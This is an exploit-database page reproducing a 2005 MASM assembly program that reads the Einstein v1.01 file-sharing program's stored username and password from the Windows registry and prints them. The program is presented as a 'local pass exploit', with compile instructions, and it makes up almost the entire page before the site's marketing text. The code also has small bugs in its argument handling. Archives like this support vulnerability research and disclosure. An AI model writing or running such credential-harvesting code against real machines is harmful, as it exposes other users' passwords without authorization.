Vulners
Lucene search
Einstein 1.01 - Local Password Disclosure (ASM)
; Nothing Special other than the program doesnt encode the user/pass in the registry.
; Einstein v1.01 - http://www.Bfriendly.com some crappy file school sharing program
; made because i think C is overkill for these types of local exploits,
; shit we can does this in vbs/bat too if ya want
;Compiles in Masm
;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj
.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
literal MACRO quoted_text:VARARG
LOCAL local_text
.data
local_text db quoted_text,0
.code
EXITM <local_text>
ENDM
SADD MACRO quoted_text:VARARG
EXITM <ADDR literal(quoted_text)>
ENDM
.data
SubKey db "Software\\einstein",0
szUser db "username",0
szPass db "password",0
noExeem db "Einstein v1.01 is not installed on your pc!",0
Theoutput db '_______________________________________________________________',13,10
db '* Einstein v1.01 Local Pass Exploit *',13,10
db '* Based On Kozans code in C *',13,10
db '* by illwill - [email protected] *',13,10
db '*_____________________________________________________________*',13,10
db ' UserName: %s ',13,10
db ' Password: %s ',13,10,0
KeySize DWORD 255
.data?
TheIPData db 64 dup (?)
TheUSERData db 64 dup (?)
ThePASSData db 64 dup (?)
TheReturn DWORD ?
strbuf db 258 dup (?)
.code
start:
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr TheReturn
.IF eax==ERROR_SUCCESS
invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr KeySize
.IF KeySize < 2
invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
.ENDIF
invoke RegQueryValueEx,TheReturn,addr szPass,0,0,addr ThePASSData, addr KeySize
.IF KeySize < 2
invoke lstrcpy,addr ThePASSData,SADD("NOT FOUND")
.ENDIF
invoke wsprintf, addr strbuf, addr Theoutput,addr TheIPData,addr TheUSERData,addr ThePASSData
invoke StdOut, addr strbuf
.ELSE
invoke StdOut, addr noExeem
.ENDIF
invoke RegCloseKey , TheReturn
Invoke ExitProcess,0
end start
; milw0rm.com [2005-02-28]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4